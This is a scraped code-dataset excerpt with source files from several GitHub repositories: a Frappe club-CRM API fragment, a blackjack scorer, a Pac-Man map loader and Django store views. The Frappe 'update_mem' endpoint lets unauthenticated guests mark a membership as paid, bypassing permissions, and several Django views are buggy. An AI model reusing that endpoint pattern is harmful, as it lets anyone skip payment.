}\n\n@frappe.whitelist(allow_guest=True)\ndef update_mem(doc_id):\n doc = frappe.get_doc(\"Memberships Application\", doc_id)\n doc.append('membership_payment', {\n \"mode_of_payment\": \"Online Payment\",\n \"paid_amount\": doc.grand_total\n\t\t})\n doc.save(ignore_permissions=True)", "repo_name": "VivekChamp/clubcrm", "sub_path": "club_crm/api/app/fitness.py", "file_name": "fitness.py", "file_ext": "py", "file_size_in_byte": 11512, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "frappe.db.get", "line_number": 12, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 12, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 12, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 14, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 18, "usage_type": "attribute"}, {"api_name": "frappe.get_list", "line_number": 24, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 26, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 37, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 44, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 50, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 10, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 57, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 58, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 61, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 78, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 55, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 84, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 84, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 84, "usage_type": "attribute"}, {"api_name": "frappe.get_doc", "line_number": 85, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 87, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 90, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 82, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 113, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 113, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 113, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 116, "usage_type": "name"}, {"api_name": "frappe.get_doc", "line_number": 116, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 119, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 122, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 131, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.time.pt_cancellation_time", "line_number": 135, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 135, "usage_type": "name"}, {"api_name": "frappe.get_all", "line_number": 138, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 157, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 109, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 165, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 165, 
"usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 165, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 166, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 174, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 163, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 213, "usage_type": "call"}, {"api_name": "frappe.db.set_value", "line_number": 214, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 214, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 219, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 211, "usage_type": "call"}, {"api_name": "club_crm.club_crm.doctype.fitness_training_appointment.fitness_training_appointment.cancel_appointment_online", "line_number": 231, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 233, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 238, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 229, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 245, "usage_type": "call"}, {"api_name": "club_crm.api.wallet.get_balance", "line_number": 249, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 250, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 243, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 258, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 256, "usage_type": "call"}]} +{"seq_id": "31975321226", "text": "from functools import reduce\n\ndef aces_value(aces, non_aces_total):\n if len(aces) == 0:\n return 0\n missing = 21 - non_aces_total\n with_11 = 11 + len(aces)-1\n without_11 = len(aces)\n if with_11 <= missing:\n return with_11\n else:\n return without_11\n\ndef card_value(card):\n if \"Q\" == card or \"J\" == card or \"K\" == card:\n return 10\n else:\n return int(card)\n\ndef value(hand):\n count = len(hand)\n aces = filter(lambda x: x == \"A\", hand)\n non_aces = filter(lambda x: x != \"A\", hand)\n non_aces_value = map(lambda x: card_value(x), non_aces)\n non_aces_total = reduce(lambda x,y: x+y, non_aces_value, 0)\n aces_total = aces_value(list(aces), non_aces_total)\n return non_aces_total + aces_total\nprint(value([\"2\",\"2\", \"3\"]))\nprint(value([\"A\", \"A\"]))\ntwenty_one_aces = [\"A\"] * 21\nprint(value(twenty_one_aces))\n\n", "repo_name": "rafaelri/coding-challenge-solutions", "sub_path": "python/blackjack/blackjack.py", "file_name": "blackjack.py", "file_ext": "py", "file_size_in_byte": 877, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "functools.reduce", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "28718791023", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Build Preliminaries of PacMan Game\"\"\"\n\nimport logging\n\n# Set logging\nlogging.basicConfig(level=logging.ERROR, filemode='w')\n\n\ndef load_map(file_pathname):\n \"\"\"Load Pac-Man Map\n\n Arguments:\n file_pathname {str} -- the file path name of a Pac-Man map\n\n Raises:\n FileNotFoundError: Provided file path name is not found\n IOError: Provided file path name can not accessible by read mode\n\n Returns:\n list -- A list of lines of Pac-Man Map\n \"\"\"\n if not isinstance(file_pathname, str):\n raise TypeError(\"Your file path must be a string\")\n try:\n # Open the file back and read the contents\n 
with open(file_pathname, \"r\") as map_file:\n contents = map_file.read().splitlines()\n # Check if the file or directory at `path` can be found\n except FileNotFoundError:\n raise FileNotFoundError(\"File does not exist\")\n # Check if the file or directory at `path` can be accessed by the program\n except IOError:\n raise IOError(\"File is not accessible\")\n # Returns a list of line\n return contents\n\n\ndef main():\n \"\"\"Demonstrate and run test\"\"\"\n file_pathname = './map/level1.amap'\n\n # Test wp01\n pacman_map = load_map(file_pathname)\n for line in pacman_map:\n print(line)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "kang-de-conqueror/pac_man", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 8, "usage_type": "attribute"}]} +{"seq_id": "19222687482", "text": "import random\nfrom decimal import Decimal\nfrom django.forms.models import model_to_dict\n\nfrom django.db.models import Q\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import JsonResponse, HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.text import slugify\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core import serializers\n\n\nfrom .models import Category, Product, ProductType, ProductSpecificationValue, Comments\nfrom .forms import AddToCartForm, AddCategoryForm, ColorSearchForm\n\nfrom apps.cart.cart import Cart\nfrom apps.vendor.forms import ProductForm, VendorRegistrationForm, VendorEditForm\nfrom apps.communication.forms import NewCommentForm\nfrom apps.vendor.models import Follow\n\n\ndef show_category(request,hierarchy= None):\n category_slug = hierarchy.split('/')\n parent = None\n root = Category.objects.all()\n for slug in category_slug[:-1]:\n parent = root.get(parent=parent, slug = slug)\n instance = Category.objects.get(parent=parent,slug=category_slug[-1])\n product = Product.objects.filter(\n category__in=Category.objects.filter(name=instance.name).get_descendants(include_self=True))\n brands = ProductType.objects.all()\n return render(request, 'product/search.html', {'product_search': product, 'product_search_query': instance\n , 'brands':brands})\n\ndef parent_child_check(request):\n if request.POST.get('mainAction') == 'post':\n id = request.POST.get('category_id')\n categories = Category.objects.filter(level=0)\n for i in categories:\n categories = Category.objects.get(id=i.id).get_descendants(include_self=True)\n response = JsonResponse({'categories': \"rr\"})\n return response\n\ndef product_all(request):\n products = Product.objects.prefetch_related(\"product_image\").filter(is_active=True)\n return render(request, \"store/product_all.html\", {\"products\": products})\n\ndef search(request):\n query = request.GET.get('query', '')\n product = Product.objects.filter(Q(title__icontains=query) | Q(description__icontains=query))\n brands = ProductType.objects.all()\n\n return render(request, 'product/search.html', {'product_search': product, 'product_search_query': query\n , 'brands':brands, 'color_input':ColorSearchForm})\n\ndef filter_page(request):\n if request.method == \"GET\":\n query = request.GET.get('query', '')\n 
query = query.split(',')\n discount_percent = []\n user_chose_spec = False\n \"\"\"sizes = ['S','M','L','X','XL','XXL','Red','Blue','White','Black',\n 'Brown','Green','Yellow','Purple','Orange','Cream','Lemon']\"\"\"\n for i in query:\n if i == '< 10%':\n for num in range(1,10):\n discount_percent.append(num)\n if i == '< 20%':\n for num in range(11,21):\n discount_percent.append(num)\n if i == '< 30%':\n for num in range(21,31):\n discount_percent.append(num)\n if i == '< 40%':\n for num in range(31,41):\n discount_percent.append(num)\n if i == '< 50%':\n for num in range(41,51):\n discount_percent.append(num)\n if i == '< 60%':\n for num in range(51,61):\n discount_percent.append(num)\n\n brands = ProductType.objects.all()\n\n name_list = []\n for i in query:\n instance = Category.objects.filter(slug=i)\n if instance:\n for all in instance:\n name_list.append(all.name)\n if 'has_category' in query and \"has_brand\" in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent, product_type__name__in=query,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif 'has_category' in query and \"has_brand\" in query:\n product = Product.objects.filter(Q(product_type__name__in=query,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif 'has_category' in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif \"has_brand\" in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent, product_type__name__in=query))\n elif 'has_category' in query:\n product = Product.objects.filter(Q(category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif \"has_brand\" in query:\n product = Product.objects.filter(Q(product_type__name__in=query))\n elif \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent))\n\n if ('has_size' in query or 'has_color' in query):\n spec_list=[]\n if ('has_category' in query or \"has_brand\" in query or \"has_discount\" in query) and \\\n ('has_size' in query or 'has_color' in query):\n specification = ProductSpecificationValue.objects.filter(Q(product__in=product, value__in=query))\n for spec in specification:\n spec_list.append(spec.product.id)\n\n if ('has_category' not in query and \"has_brand\" not in query and \"has_discount\" not in query) and \\\n ('has_size' in query or 'has_color' in query):\n specification = ProductSpecificationValue.objects.filter(Q(value__in=query))\n for spec in specification:\n spec_list.append(spec.product.id)\n product = Product.objects.filter(Q(id__in=spec_list))\n if ('has_category' in query):\n query.remove('has_category')\n if (\"has_brand\" in query):\n query.remove(\"has_brand\")\n if (\"has_discount\" in query):\n query.remove(\"has_discount\")\n if ('has_size' in query):\n query.remove('has_size')\n if ('has_color' in query):\n query.remove('has_color')\n\n return render(request, 'product/filter_page.html', {'product_search': product, 'product_search_query': query\n , 'brands':brands, 'user_chose_spec':user_chose_spec})\n\ndef search_brand(request):\n if request.GET.get('action') == 'get':\n brands = request.GET.get('brands')\n brands = ProductType.objects.filter(name__iexact=brands)\n\n item = 
{}\n if brands:\n serialized_queryset = serializers.serialize('python', brands)\n item['table'] = serialized_queryset\n\n response = JsonResponse({'item': item})\n return response\n\nfrom django import template\nregister = template.Library()\n\n\n#@register.simple_tag(takes_context=True)\n@register.filter(is_safe=True)\ndef search_single(request):\n if request.method == \"GET\":\n query = request.GET.get('query', '')\n product_search = Product.objects.filter(Q(title__icontains=query) |\n Q(description__icontains=query) | Q(id__icontains=query))\n brands = ProductType.objects.all()\n\n response = JsonResponse({'product_search': list(product_search)})\n return response\n\ndef search_single2(request):\n if request.GET.get('action') == 'get':\n query = request.GET.get('productID')\n product_search = Product.objects.filter(Q(title__icontains=query) |\n Q(description__icontains=query) | Q(id__icontains=query)).values()\n brands = ProductType.objects.all()\n product = \"\"\"\n
\n {% for i in product_search %}\n \n \"\"\"\n response = JsonResponse({'product_search': list(product)})\n return response\ndef product_detail(request, category_slugz, product_slugz):\n cart = Cart(request)\n products = get_object_or_404(Product, category__slug=category_slugz, slug=product_slugz, is_active=True)\n stores_user_follow=[]\n for i in products.vendor.vendor_follower.all():\n stores_user_follow.append(i.follower)\n\n wishlist = products.users_wishlist.all().count()\n likes = products.likes.all().count()\n product_id = str(products.id)\n wishlist_boolean = False\n like_boolean = False\n product_spec = ProductSpecificationValue.objects.filter(product=products)\n\n #------------------------------------------------------\n allcomments = products.comments.all()\n page = request.GET.get('page', 1)\n\n paginator = Paginator(allcomments, 10)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n if products.users_wishlist.filter(id=request.user.id).exists():\n wishlist_boolean=True\n if products.likes.filter(id=request.user.id).exists():\n like_boolean=True\n if request.method == 'POST':\n comment_form = NewCommentForm(request.POST)\n if comment_form.is_valid():\n user_comment = comment_form.save(commit=False)\n user_comment.post = products\n user_comment.save()\n return HttpResponseRedirect('/' + products.slug)\n\n return redirect('product_:product_detail_', category_slug= category_slugz, product_slug=product_slugz)\n else:\n comment_form = NewCommentForm()\n form = AddToCartForm()\n\n #----------------------------------------------------\n similar_products = list(products.category.product_category.exclude(id=products.id))\n if len(similar_products) >= 4:\n similar_products = random.sample(similar_products, 4)\n\n #-------------------------------------------------\n breadcrumbs_link = products.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n return render(request, 'product/product.html', {'comment_form': comment_form, 'product': products, 'product_id': product_id,\n 'wishlist': str(wishlist), 'wishlist_boolean':wishlist_boolean,\n 'likes': str(likes), 'like_boolean':like_boolean, 'allcomments':allcomments, 'comments':comments,\n 'product_spec':product_spec, 'stores_user_follow':stores_user_follow, 'breadcrumbs': breadcrumbs})\n\n\ndef make_comment(request):\n cart = Cart(request)\n if request.POST.get('action') == 'post':\n name = request.POST.get('name')\n email = request.POST.get('email')\n comment = request.POST.get('comment')\n product_id = request.POST.get('product_id')\n products = Product.objects.get_object_or_404get(id=product_id)\n wishlist = products.users_wishlist.all().count()\n likes = products.likes.all().count()\n product_id = str(products.id)\n wishlist_boolean = False\n like_boolean = False\n product_spec = ProductSpecificationValue.objects.filter(product=products)\n\n # ------------------------------------------------------\n if request.user.is_authenticated:\n Comments.objects.create(made_by=request.user,\n name=request.user.firstname + \" \" + request.user.surname,\n email=request.user.email, default_image=request.user.user_image,\n made_on=products, parent=None, content=comment)\n else:\n if not request.user.is_authenticated and name != \"\" and email != \"\":\n Comments.objects.create(made_by=None, name=name, email=request.user.email,\n 
made_on=products, parent=None, content=comment)\n else:\n error = \"e no follo\"\n\n response = JsonResponse({'comments': error})\n return response\n\n allcomments = products.comments.all()\n page = request.GET.get('page', 1)\n\n paginator = Paginator(allcomments, 10)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n if products.users_wishlist.filter(id=request.user.id).exists():\n wishlist_boolean = True\n if products.likes.filter(id=request.user.id).exists():\n like_boolean = True\n\n # ----------------------------------------------------\n similar_products = list(products.category.product_category.exclude(id=products.id))\n if len(similar_products) >= 4:\n similar_products = random.sample(similar_products, 4)\n\n # -------------------------------------------------\n breadcrumbs_link = products.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n\n\n comment_form = NewCommentForm()\n form = AddToCartForm()\n\n return render(request, 'product/product.html',\n {'comment_form': comment_form, 'product': products, 'product_id': product_id,\n 'wishlist': str(wishlist), 'wishlist_boolean': wishlist_boolean,\n 'likes': str(likes), 'like_boolean': like_boolean, 'allcomments': allcomments,\n 'comments': comments,\n 'product_spec': product_spec, 'breadcrumbs': breadcrumbs})\n\n\ndef product_detail2(request):\n cart = Cart(request)\n if request.POST.get('action') == 'post':\n qtyAction = request.POST.get('qtyAction')\n productID = int(request.POST.get('productID'))\n productQTY = int(request.POST.get('productQTY'))\n if qtyAction == 'include_item':\n product = get_object_or_404(Product, id=productID)\n cart.add(product_id=productID, product=product, quantity=productQTY, update_quantity=False)\n messages.success(request, 'The account was successfully added to the account')\n response = JsonResponse(\n {'cart_length': cart.__len__()})\n return response\n\n@login_required\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = AddCategoryForm(request.POST)\n if form.is_valid():\n vendor = form.save(commit=False)\n title = form.cleaned_data['title']\n slug = form.cleaned_data['slug']\n Category.objects.create(title=title, slug=slug, ordering='1')\n else:\n form=AddCategoryForm()\n return render(request,'product/add_category.html', {'form':form})\n else:\n return redirect('core_:frontpage')\n\ndef category_list(request, category_slug):\n category = get_object_or_404(Category, slug=category_slug)\n return render(request, 'product/category.html', {'category_in_product_view': category})\n\ndef vendor_category(request):\n if request.GET.get('mainAction') == 'post':\n category_slug = request.GET.get('category_slug')\n category = get_object_or_404(Category, slug=category_slug)\n product = Product.objects.filter(\n Product, category__in=Category.objects.get(name=category_slug).get_descendants(include_self=True)\n )\n response = JsonResponse({'product': product})\n return response\n\n@login_required\ndef likes_add_and_remove(request, id):\n if request.GET.get('action') == 'get':\n product = get_object_or_404(Product, id=id)\n if product.likes.filter(id=request.user.id).exists():\n product.likes.remove(request.user)\n product_exist = True\n action_text=' like'\n else:\n product.likes.add(request.user)\n product_exist = False\n action_text=' 
unlike'\n likes = product.likes.all().count()\n response = JsonResponse({'likes_no': str(likes), 'action_text':action_text, 'product_exist':product_exist})\n return response\n\n@login_required\ndef remove_from_likes(request):\n if request.GET.get('action') == 'get':\n id = request.GET.get('productID')\n product = get_object_or_404(Product, id=id)\n product_count=product.likes.add(request.user).count()\n if product.likes.filter(id=request.user.id).exists():\n product.likes.remove(request.user)\n messages.success(request, \"you have unliked \" + product.title)\n response = JsonResponse({'product_count':product_count})\n return response\n\n@login_required\ndef add_product(request):\n vendor = request.user.which_vendor\n if request.method == \"POST\":\n form = ProductForm(request.POST, request.FILES)\n if form.is_valid():\n product = form.save(commit=False)\n\n product.vendor = vendor\n product.title = product.title\n product.category = product.category\n product.slug = slugify(product.title)\n product.description = product.description\n product.price = Decimal(product.price)\n product.in_stock = True\n product.is_active = True\n product.save()\n return redirect('vendor_:vendor_admin_')\n else:\n form=ProductForm()\n return render(request,'vendor/add_product.html', {'form':form})\n\n@login_required\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = AddCategoryForm(request.POST)\n if form.is_valid():\n vendor = form.save(commit=False)\n title = vendor.cleaned_data['title']\n slug = vendor.cleaned_data['slug']\n Category.objects.create(title=title, slug=slug, ordering='1')\n else:\n form=AddCategoryForm()\n return render(request,'product/add_category.html', {'form':form})\n else:\n return redirect('core_:frontpage')\n", "repo_name": "Pycobra/NgStore2", "sub_path": "apps/product/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 19849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.Category.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 27, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 31, "usage_type": "name"}, {"api_name": "models.Category.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 32, "usage_type": "name"}, {"api_name": "models.ProductType.objects.all", "line_number": 33, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 33, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 40, "usage_type": 
"attribute"}, {"api_name": "models.Category", "line_number": 40, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 42, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Product.objects.prefetch_related", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 52, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 53, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 53, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "forms.ColorSearchForm", "line_number": 56, "usage_type": "name"}, {"api_name": "models.ProductType.objects.all", "line_number": 86, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 86, "usage_type": "name"}, {"api_name": "models.Category.objects.filter", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 90, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 95, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 96, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 98, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 99, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 101, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 102, 
"usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 102, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 104, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 106, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 106, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 108, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 110, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 110, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 110, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 116, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 116, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 122, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 137, "usage_type": "call"}, {"api_name": "models.ProductType.objects.filter", "line_number": 143, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 143, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 147, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 147, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 150, "usage_type": "call"}, {"api_name": "django.template.Library", "line_number": 154, "usage_type": "call"}, {"api_name": 
"django.template", "line_number": 154, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 162, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 162, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 162, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 162, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 163, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 164, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 164, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 164, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 172, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 172, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 172, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 172, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 173, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 174, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 199, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 202, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 203, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 203, "usage_type": "argument"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 213, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 213, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 213, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 219, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 222, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 224, "usage_type": "name"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 232, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 237, 